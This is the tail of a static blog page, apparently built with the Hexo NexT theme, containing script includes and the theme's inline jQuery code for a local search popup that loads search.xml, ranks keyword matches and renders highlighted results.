  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  
  

  

  

  

</body>
</html>
